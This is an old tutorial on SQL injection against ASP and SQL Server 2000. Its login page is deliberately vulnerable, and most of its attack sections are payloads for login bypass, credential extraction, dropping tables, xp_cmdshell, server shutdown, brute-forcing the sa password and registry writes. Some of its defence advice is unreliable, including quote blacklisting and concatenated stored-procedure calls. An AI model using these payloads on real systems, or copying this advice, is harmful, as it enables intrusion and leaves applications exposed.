A Step by Step Guide to SQL Injections

[Abstract]...........................................................................................................................2 What is SQL Injection?...................................................................................................2 Test Environment for Checking SQL Injections:......................................................2 Architecture:...................................................................................................................3 Database Management System:..................................................................................3 Front- end Structure:......................................................................................................4 SQL Injections [At the Database Level].......................................................................6 Bypassing User Authentication:...............................................................................6
How to Secure against illegal authentication?.................................................................................7

Determine column of the table:................................................................................8 Getting all Columns of the Table: (Using Group by Clause)...............................8 Determining the Number of Columns: (Using Union Clause)..........................9 Finding Data types: (using aggregate functions)................................................10
Why we need all columns and Data Types?.................................................................................... 0 1

Getting Username & Password from table:..........................................................10 Inserting Values in the Table:..................................................................................13 Updating Values of the Table:..................................................................................13 Deleting Entire Data from the Table: (using Delete or Drop statement)......14 Displaying desired Information from the table in the Browser:.....................14 SQL Injections [Going beyond the Databases]........................................................15 Getting server name:.................................................................................................15 Xp_cmdshell :..............................................................................................................16 Shutting Down the SQL Server:...............................................................................16 Brute Force to Find Password of SQL Server:......................................................16 Xp_regread and Xp_regwrite extended procedure:............................................17 Xp_servicecontrol:.....................................................................................................18 Bulk Insert Statement:..............................................................................................19 How to prevent against SQL Injections:...................................................................19 Appendix:.........................................................................................................................20 Union Clause:...............................................................................................................20 Group By Clause:..........................................................................................................20 Delete/Drop statement:...............................................................................................20 ODBC driver:................................................................................................................20 Microsoft Internet Information Server (IIS):............................................................21

[Abstract]

This document discuss in detail common as well as some advance SQL Injection techniques as it applies to Microsoft Internet Information Server / Active Server Pages / Microsoft SQL Server. It discusses the various ways in which SQL can be injected & how one can protect him against the SQL injections. This document also contains brief description of the terms used in the context of databases & web Application.

What is SQL Injection? SQL Injection is a technique where an attacker creates or alters existing SQL commands (by using some special symbol) to gain access to unintended data or even the ability to execute system level commands in the server. SQL injections are the result of Poor Input Validation and can be blocked by proper input validation. Application that do not correctly validate and/or sanitize the user input, can potentially be exploited in several ways: • Changing SQL values. • Concatenating SQL Values. • Adding Function calls & stored Procedures to a statement. • Typecast and concatenate retrieved data. • Adding system functions & procedure to find out critical information about the server.

Test Environment for Checking SQL Injections: Test environment is very simple, which uses Microsoft SQL server 2000 as a Database Management System, Web Server and a authentication web site. The test environment also contains two asp pages one is for gathering user

input & another one is for checking user input against the data in the database using SQL Query. Architecture: Test Environment is based on the Two tire Architecture. Diagram of typical two- tire architecture is shown below:

In a two- tier architecture a client talks directly to a server, with no intervening server. It is typically used in small environments (less than 50 users). Some important characteristics of a two- tier application are: • User Interface on clients (desktops). • Database on servers (more powerful machines). • Business logic residing mostly on clients. • Stored procedures for data access on the servers. • SQLs used for commu nication.

Database Management System: [Microsoft SQL Server 2000]. Database Name Table Name Table Structure : Injection. : Authentication. : Slno Name Integer (4) Character (20)

Password Character (20)

Front- end Structure: Authentication Page: [Login.asp] This page is designed to take user input. There are two text boxes in the

page with one submit button. When user click on the submit button the values of the text boxes are submitted to verify.asp page at the Server site. [There are two methods (GET & POST) to submit values from a web page to another. Since only few applications uses GET method, so in this scenario we are using POST Method only, but same thing can be achieved by using Get Method as well. The difference between GET & POST method is in get method the data is appended to the URL using “?” and a user can see the data being transferred in the address bar. While data being transferred using post method doesn’t appended to the URL & thus doesn’t appear in the address bar i.e. it is kept hidden from the users. The data sent by using POST method is grab in ASP page using request.form object while data sent by using GET method is grab using requset.querystring object. The process of SQL injection will be same for both the cases. The following snip will tell you how information appears in the browser.

Code of the Login.asp page: <HTML> <BODY BGCOLOR=FFFFFF> <FORM ACTION ="verify.asp" METHOD = POST> Name: <INPUT TYPE=TEXT SIZE=20 NAME=USERNAME> Password: <INPUT TYPE=PASSWORD SIZE=20 NAME=USERPASSWORD> <INPUT TYPE=SUBMIT VALUE="Login Now"> </BODY> </HTML>

AuthenticationVerify Page: [Verify.asp] This page is designed to grab input from the Login.asp page & check it against the data in the databases. Typical query to validate user data is written as: Set recordset = connectionstering.execute ("SELECT * FROM

authentication WHERE " & "Name'" & request.form ("username") & "' AND " & _ "Password'" & request.form ("UserPassword") & "' ")
Code of the Verify.asp Page:
<%@ Language =VBScript %> <% Response.Buffer =false %> <HTML> <HEAD> <META NAME="GENERATOR" Content ="Microsoft Visual Studio 6.0"> </HEAD> <BODY> <% 'Variable Declaration Dim Cm, Trec Set Cm = Server.CreateObject("ADODB.Connection") Set Trec = Server.CreateObject("ADODB.Recordset") ConnectionStrin g= "driver={SQLServer};

Server=middleearth;Database=injection;UID=sa;PWD=sa” QueryText = "SELECT * FROM authentication WHERE " & _ "Name ='" & Request.Form("UserName") & "' AND " & _ "Password ='" & Request.Form("UserPassword") & "' " 'Response.Write (QueryText) 'Opening Connection Object because we need to put data or get data somewhere Cm.Open (ConnectionString) 'Opening a Recordset which execute query Trec.Open QueryText,cm If not Trec.EOF then Response.write("authentic") else

Response.Write("not authentic") end if Response.Write("<br>"+QueryText) %> </BODY> </HTML>

SQL Injections [At the Database Level]
The first step before SQL Injections is to test whether a site is vulnerable to SQL Injections or not. It can be achieved by giving some arbitrary input. If input results in an error message (other than user generated error message), it means site is vulnerable to SQL Injections. To find whether a sire is vulnerable to SQL injections try followings special characters in input:

;

,

‘‘

%

-

*

Bypassing User Authentication: An attacker can easily bypass Login Page without providing a valid user name & password. He just need to give: ' Or 1=1;-- (In the User Name text Box) On submitting this page SQL query (at the server) becomes: Select * from authentication where Name =' ' or 1=1; -Note: MS SQL Server treats anything after; -- as comment so rest of the query will be ignored. What attacker has done here is without specifying a valid username & password he bypasses the Login page. Telling you frankly even if site is vulnerable to SQL Injections most of the time it will not work. It depends on the way ASP Code is written. Key thing behind SQL Injection is your input should be according to ASP

code to get desired result. Here I would like to suggest that you should try all the following possible combinations and more, which you can think. 1. ' Or 1=1; -2. ' Or 1=1); -3. ' any_bad_value 4. ‘ “ 5. ‘ “or” 6.“ any_bad_value” ‘ etc.
Note: This explanation is just for understanding from this test scenario. This varies on your Web Application code.

How to Secure against illegal authentication? To restrict an attacker you can use stored procedures (with username as its parameter) instead of writing complete SQL query in the querystring. That is something like ... Set Recordsource = connectionstering.execute (exec logincheck "' &requset.querystring ("username") &"'"). Now while trying to bypass this code by supplying ' or 1=1 as username it wont work. The reason is SQL queries that execute a stored procedure can’t be conditional and the presence of 'OR' makes it so. Thus produce an error: Microsoft OLE DB Provider for ODBC drivers error '80040e14' [Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'. /verify1.asp, line 5.

Determine column of the table: Till this stages an Attacker don’t know anything about table structure. He needs to know column name and table name to perform SQL Injection further. He can find out a column name by giving input something like Skillz’ in the username textbox. When He submit the page the query at

the server site will be something like: Select * from authentication where username = 'Skillz'' and password = '' When ODBC tries to parse that query it will generate the following error message: Microsoft OLE DB Provider for ODBC drivers error '80040e14' [Microsoft] [ODBC SQL Server] Unclosed quotation mark before the character string 'Skillz' AND Password=‘‘

This seems to be very interesting messages from an attacker’s point of view as he has got one column of the table i.e. PASSWORD. And now he can use it to get other columns of the table.

Getting all Columns of the Table: (Using Group by Clause) Here is the explanation, how an attacker can get other columns of the table using the first column He has just got. He will also get table with the column name. This is what an attacker has to enter in the user name text box: Skillz’ group by (password); -When attacker submit this page the query at the server site will become: Select * from authentication where username = 'Skillz' group by (password); -When ODBC try to parse this SQL query it will generate following error message: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server] Column

'authentication.slno' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /verify.asp, line 24

The error is generated by ODBC driver because of the fact that, group by should contain all the columns occurring in select list. This error seems to be more interesting then the previous one as from this error attacker got two things one is NEW COLUMN NAME and another one is the TABLE NAME.

By keep- applying group- by clause recursively with newly found column Attacker can get all the columns of the table.

Determining the Number of Columns: (Using Union Clause) To check that whether Attacker has got all the columns or not, he has just need to use union clause: An attacker can proceed by giving input into text box: Skillz’ union select slno, password from authentication; -On submitting this value the query at the server site becomes something like: Select * from authentication where name = 'Skillz' union select slno, password from authentication- When ODBC try to parse this query it will generate following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement containing a UNION operator must have an equal nu mber of expressions in their target lists. /verify1.asp, line 24 What does this error means? This means server is telling that slno & password are not the only column in the table, as the UNION clause is not matching the number of columns in the table. This means attacker has to use group by clause again to find

the hidden columns. When he include all the columns in the query ODBC will not generate any error message & that is the indication that attacker has got all the columns of the table.

Finding Data types: (using aggregate functions) At this stage attacker got the table name & all the columns of the table. But if he wants to insert some value(s) in the table or to update some column value he would need data type of the columns.

To find out data type of the column he just has to enter: Skillz’ compute sum (name) in the username text box. When this value is submitted to the server, query at the server site becomes: Select * from authentication where name = ’Skillz’ compute sum (name) Here (name) is a column name of currently used table. When ODBC try to parse this query, it will generate following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a char data type as an argument. /verify.asp, line 24

The above error message is giving information that the name field of the table is of VARCHAR type. By proceeding in the same manner & applying aggregate functions on the rest of the columns we can get data types for all the columns. Why we need all columns and Data Types? All column names might be required to insert values in all columns. Here it might be a question why I need to insert values in all fields, why not only on selected fields? The answer for this is some columns don’t

support null values and we have to specify some value for such columns otherwise it won’t be possible to insert values into table.

Getting Username & Password from table: Aggregate functions can be used to determining some values in any table in the database. Since the attacker is interested in usernames & passwords, they are likely to read the usernames from the user table, like this: Username: ‘ union select min (name), 1,1 from authentication where username > ‘a’;-Select * from authentication where name =’’ union select min (name), 1,1 from authentication where username > ‘a’; -When the above query is executed its first statement (before union clause) returns null value and Second returns minimu m username that is greater than ‘a’, and attempts to convert it to an integer, and thus produces an error: Microsoft OLE DB provider for ODBC driver error ‘80040e07’ [Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘Skillz’ to a column of data type int. /verify.asp, line 25 So the attacker now knows that the username ‘Skillz’ exist in the table. He can now iterate through the rows in the table by substituting each new username he discovered into where clause:

Username: ‘union select min (name), 1,1 from authentication where username > ‘Skillz’ Again when ODBC tries to convert character value in the integer, it generates an error: Microsoft OLE DB provider for ODBC driver error ‘80040e07’

[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar value ‘Rahul’ to a column of data type int. /verify.asp, line 25 From this error attacker has got one more username that exist in the table. By proceeding in the same manner he can obtain all the username from the table. Once the attacker got the usernames, he can starts gathering passwords. Username: ‘union select password, 1,1 from authentication where name =’Skillz’ Again ODBC tries to convert character value (password) to an integer & generates the following error message: Microsoft OLE DB provider for ODBC driver error ‘80040e07’ [Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting the character value ‘Vikas’ to a column of a data type Int. From the above error attacker comes to know that Vikas is the password for user Skillz. A More elegant way to display all username & password is concatenate usernames & passwords into a single string & then attempt to convert into an integer. Following script, which is written in PL/SQL, converts all usernames & passwords into a single string & store into a temporary table.

Begin Declare @col varchar(8000) Set @col = ':' (you can give any value instead of : )

select @col = @col + 'username:' + rtrim(name)+ 'Password:' + rtrim (password) + '' from authentication where name > @col Select @col as col into temp_table

End;

Note: -

temp_table is the temporary table name. Col is the name of column of temporary table temp_table. @Col is variable for the PL/SQL script.

Now attacker can use this temp_table to get all the username & password of the table. Username: ‘ Union select col, 1,1 from temp_table; -When ODBC tries to convert string in to integer data type, it will generate the following error: Microsoft OLE DB provider for ODBC driver error ‘80040e07’ [Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting the varchar value ‘: username: Skillz Password: vikas Username: rahul Password: Skillz Username: vikas Password: Skillz’ to a column of a data type Integer. The string represents the username & its password, separated by words username & password.

Inserting Values in the Table: As attacker has already got all the necessary information (table name, column name, data type of columns) required to insert values in the table He can easily insert data into the table using insert statement. At attacker just need to enter: ’ insert into authentication (name, password) values ('Skillz','Skillz'); -When this value is submitted at the server site, query becomes: Select * from authentication where name = ’ ’ Insert into authentication (name, password) values (‘Skillz’,'Skillz'); -Here the select query doesn’t make any sense so it is ignored & insert query is successfully executed.

Updating Values of the Table: Following the same procedure as insert, an attacker can easily update values of the table. To update values of columns say password of a user an attacker just need to proceed by submitting: ’ update authentication set password = 'Skillz' where name =‘rahul’;-- in the user name text box. When this values is submitted the query at the server site becomes: Select * from authentication where name =’’ Update authentication set password = ‘rahul’ where username = ’Skillz’; -So what an attacker has done is he successfully changed the password of user “Skillz” without knowing his Old Password.

Deleting Entire Data from the Table: (using Delete or Drop statement) An attacker can make our life much more difficult by dropping the data of entire table by using delete statement or Drop table statement. He just has to enter a simple statement: '; drop table authentication; -- or Skillz’ delete from authentication; -- in the username textbox. When this statement is submitted to the server, query becomes: Select * from authentication where name = ‘‘ drop table authentication; -or Select* from authentication where name = ‘Skillz’ delete from

authentication;-And the result of this query is: We lost all data stored in the table authentication

Displaying desired Information from the table in the Browser: I have mentioned this earlier in sense of how to get username and password. Here it’s in more detail to get all fields of the table. A attacker

can use stored procedure /PL- SQL Block to display entire data of Column (s) in the browser itself. This is a two step Procedure: 1. In the first step an Attacker creates a temporary table (on the server) which holds data from the Main table (on the server). The temporary table contains only one column & that column will contain the values from different columns of the main table as a string. 2. In the second step an Attacker displays data from the temporary table he has created in the previous stage. Ex.: Following PL/SQL Block can be used to create a temporary table having single column named as col, Which can hold data of all the desired columns (as a concatenated string). Skillz’ begin declare @col varchar (2000) Set @col=':' Select @col = @col + ' ' authentication; Select @col as col into temp_table; End; -Now the Next step is to display data from the temporary table in the browser: ' union select col, 1,1 from temp_table -After submitting the above text in the username text box, SQL query at the server site will become: Select * from authentication where name = '' Union select col,1,1 from temp_table;- As first column in the authentication is numeric & the column in the temp_table is of character type, when ODBC tries to match the two columns it generates an error and will display all the data in the Browser from the temp_table. + slno+’/’+name + '/' + password from

SQL Injections [Going beyond the Databases]
Once the attacker has got control to the database, they are likely to use that access to gain further control. An attacker can achieve this by using following: Using @@variables of SQL Server. By using xp_cmdshell extended procedure to run commands on the server. By using xp_regread extended procedure to read the registry keys of the server. By using xp_regwrite extended procedure to edit the registry of the server. By using xp_servicecontrol Use other extended procedures to influence the server functions. Use bulk insert statement to read a file on the server. Getting server name: We can even determine server name by using SQL-SERVER in- built functions in to SQL Queries. Eg: ' union select @@servername, 1,1 --

Select @@servername will return the server name & when it is compared with the first column of authentication table (which is a numeric column) ODBC will generate an error & server name will be printed in the Browser. Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'MIDDLEEARTH' to a column of data type int. /verify.asp, line 28

Xp_cmdshell : An attacker can use SQL-SERVER in- built procedure (xp_cmdshell) to get

the listing of existing directories/files on the server. Eg. : ' Xp_cmdshell 'dir'

Shutting Down the SQL Server: An attacker can even shutdown the SQL server if the privileges are not managed properly. An attacker can shut down the server by giving following statement in the username text box: ‘; SHUTDOWN When this value is submitted at the server site, the SQL Query becomes: Select * from authentication where name = ‘‘; SHUTDOWN .As ‘;’ is the command separator in SQL server, after executing the select statement it executes SHUTDOWN statement which close the SQL server & further request send to the server will fail.

Brute Force to Find Password of SQL Server: If an attacker has access to an account that can issue the ‘OPENROWSET’ command, they can attempt to re- authenticate with SQL Server,

effectively allowing them to guess passwords. There are several variants of ‘OPENROWSET’ syntax. The most useful syntax of OPENROWSET is: Using MSDASQL: Select * from OPENROWSET (‘MSDASQL’,’DRIVER = {SQL SERVER}; SERVER =; uid = Sa; pwd = Sa ’,’’ select * from version’) Using SQLOLEDB: Select * from OPENROWSET (‘SQLOLEDB’, ’ ‘; ‘Sa’; ‘Sa’,’ select @@version’) By default everyone can execute ‘XP_execresultset’, which leads to the following elaboration on the previous two methods:

Using MSDASQL: Exec XP_execresultset N‘ select * from OPENROWSET (‘ ‘ MSDASQL‘ ’ ’, ‘ ’ DRIVER ={SQL Server}; SERVER =; uid = Sa; pwd =foo ‘‘, ‘’ select @@version) ‘, N’master

Using SQLOLEDB: Exec XP_execresultset N’ select * from OPENROWSET (‘’ SQLOLEDB ‘’, ‘’ ‘’; ‘’ sa ‘’; ‘’ foo ‘’; ’’ select @@version ‘’)’ N’master

By default in the SQL Server 2000, a low–privileged account cannot execute the MSDASQL variant of the above syntax, but they can execute the SQLLOLEDB syntax. OPENROWSET authentication is instant, and provides no timeout in the case of an unsuccessful authentication attempt, it is possible to inject a script that will brute force the ‘sa’ password by using the processing capabilities of the server itself.

Xp_regread and Xp_regwrite extended procedure: An attacker can use extended procedure to read or change the registry contents. He can use extended procedure xp_regread to read the registry of the system or xp_regwrite to write in the system registry. For example, to read into the variable @test from the value 'TestValue' from the key 'SOFTWARE\Test' from the 'HKEY_LOCAL_MACHINE', an attacker can use: DECLARE @test varchar (20) EXEC master..Xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Test', @value_name ='TestValue', @value=@test OUTPUTSELECT @test Some more e.g. are: Exec xp_regread HKEY_LOCAL_MACHIN,

'SYSTEM\Cureentcontrolset\Services\lanmanserver\para meters','nulls essionshare' (This determines what null- session shares are available on the server) Exec xp_regenumvalues HKEY_LOCAL_MACHINE, ' SYSTEM\CurrentControlSet\Services\snmp \ p a ra meters\validcommun ities' (This will reveal all of the SNMP commu nities Configured on the server. With this information, an attacker can probably reconfigure network appliances in the same area of the network, since SNMP communities tend to be infrequently changed, and shared among many hosts) E.g. of xp_regwrite is: EXECUTE xp_regwrite [@rootkey =] 'rootkey', [@key =]'key', [@ value_name =]'value_name', [@ type =]'type', [@ value =]'value' For example, to write the variable 'Test' to the 'TestValue' value, key 'SOFTWARE\Test', 'HKEY_LOCAL_MACHINE' an attacker can use: EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Test', @value_name='TestValue', @type='REG_SZ', @value='Test'

Xp_servicecontrol: Master..xp_servicecontrol extended procedure allows an attacker to start, stop & pause a service. For e.g.: Exec master..xp_servicecontrol 'start','schedule' Exec master..xp_servicecontrol 'star Note: - There are lots of extended procedures available in MS-SQL Server but we are not going in to detail of each & every procedure.

Bulk Insert Statement: Using Bulk insert statement, it is possible to insert a text file into a

temporary table. So the attacker can easily read a file on the web server by first converting it in to database table & then use union clause against this table. Following is the procedure: First create a table: Create table temp_table (Col varchar(8000)) Then , use bulk insert statement to insert data from desired file to this table. That can be done by statement: Bulk insert temp_table from ‘c:\inetpub\wwwroot\verify.asp’. After execution of this statement the table contains code of the page verify.asp & this code can be displayed in the browser using any of the above error message technique like Union. (This is very useful for obtaining the source code of scripts stored on the database server, or possibly the source code of ASP pages.)

How to prevent against SQL Injections:

Validate Input properly. • Do not allow users to enter special symbols like ‘ ; -- “ % * _ etc. • Replace single ‘ with space. Using replace function like: Replace (request.form (“name”),”’”,” “) • Replace single ‘ with ‘’ Replace (request.form (“name”), “’”,”’’”) • If input in question is numeric then use numeric function like isnumber ( ) to check whether input is numeric or not. Use procedures instead of writing queries directly in the recordset object. Give only necessary privileges to the users. Drop unnecessary system procedure, so that nobody can use it

maliciously.

Appendix: Union Clause: Union clause is used to combine results of two queries. Both queries must have Equal number of columns with same data types. Group By Clause: Group by Clause is used to group some related data. Columns appearing in the select list must be included in Group By clause or they must used with some group by functions. Having clause can be used to restrict groups. Delete/Drop statement: Delete statement deletes entire data of the table, but it doesn’t delete structure of the table. Drop statement delete entire data as well as table structure. ODBC driver: Open Database Connectivity (ODBC) is an applicationprogramming interface (API) for programs that use SQL to access data. ODBC is a multi- database API because an ODBC program can operate with heterogeneous databases and disparate SQL DBMS without requiring source code changes. Microsoft created ODBC by extending a Call Level Interface from the SQL Access Group (now part of The Open Group).

Microsoft Internet Information Server (IIS): Internet information server is a World Wide Web server, contains features of both web server & Ftp server. IIS allows publishing web pages over the Internet & extent the capabilities of the web pages using ASP. ActiveX Data Objects (ADO): ADO is a powerful & ready to use Object Model that is used to access data .ADO is preferred data object to use with IIS & web applications. ADO is very powerful & flexible as it can be used with any database management system like Microsoft SQL Server, MS Access or Oracle & Still with same programming model, regardless of features of particular database.